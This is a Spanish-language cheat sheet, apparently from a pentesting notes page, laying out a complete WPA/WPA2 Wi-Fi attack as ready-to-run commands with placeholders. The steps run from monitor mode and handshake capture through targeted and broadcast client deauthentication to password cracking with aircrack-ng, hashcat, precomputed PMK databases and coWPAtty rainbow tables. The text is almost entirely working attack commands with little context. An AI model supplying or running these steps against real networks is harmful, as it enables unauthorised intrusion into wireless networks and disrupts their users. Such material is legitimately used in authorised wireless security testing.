WPA/WPA2
WPA, Wi-Fi Protected Access.
Habilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info
Captura de paquetes para identificar BSSID, ESSID y canal objetivo.
sudo airodump-ng <interface-mon>
Captura de paquetes de BSSID, ESSID y canal específico.
sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcap
Desautenticación de cliente(s).
# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>
Cracking con Aircrack-ng.
# Wordlist
aircrack-ng -b <BSSID> -e <ESSID> -w <path-wordlist> <file-name>.cap
# John the Ripper y Aircrack-ng
john --wordlist=<path-wordlist> --rules --stdout | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap
# crunch y Aircrack-ng
crunch <min-word-length> <max-word-length> -t <word>%%% | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap
# RSMangler y Aircrack-ng
rsmangler --file <words.txt> --min <min-word-length> --max <max-word-length> | aircrack-ng -b <BSSID> -e <ESSID> -w - <file-name>.cap
Cracking con Hashcat.
hcxpcapngtool -o hash.hc22000 <file-name>.cap
hashcat -m 22000 hash.hc22000 <path-wordlist>
hashcat -m 22000 hash.hc22000 --show
Cracking con Precálculo de Pairwise Master Keys (PMK).
# Creación de archivo de con nombre de ESSID
echo "<ESSID>" > essid.txt
# Importar ESSID a base de datos de Airolib-ng
airolib-ng <database-name>.sqlite --import essid essid.txt
# Obtener estadísticas de la base de datos
airolib-ng <database-name>.sqlite --stats
# Importar wordlist de contraseñas a base de datos
airolib-ng <database-name>.sqlite --import passwd <path-wordlist>
# Procesar y generar Pairwise Master Keys (PMK)
airolib-ng <database-name>.sqlite --batch
# Cracking con precálculo de Pairwise Master Keys (PMK)
aircrack-ng -r <database-name>.sqlite <file-name>.cap
Rainbow table.
# Generación de rainbow table
genpmk -f <path-wordlist> -d hashes -s <ESSID>
# Cracking con coWPAtty utilizando rainbow table
cowpatty -r <file-name>.cap -d hashes -s <ESSID>
Confirmar que la clave obtenida es correcta.
airdecap-ng -b <BSSID> -e <ESSID> -p <password> <file-name>.cap
Última actualización
¿Te fue útil?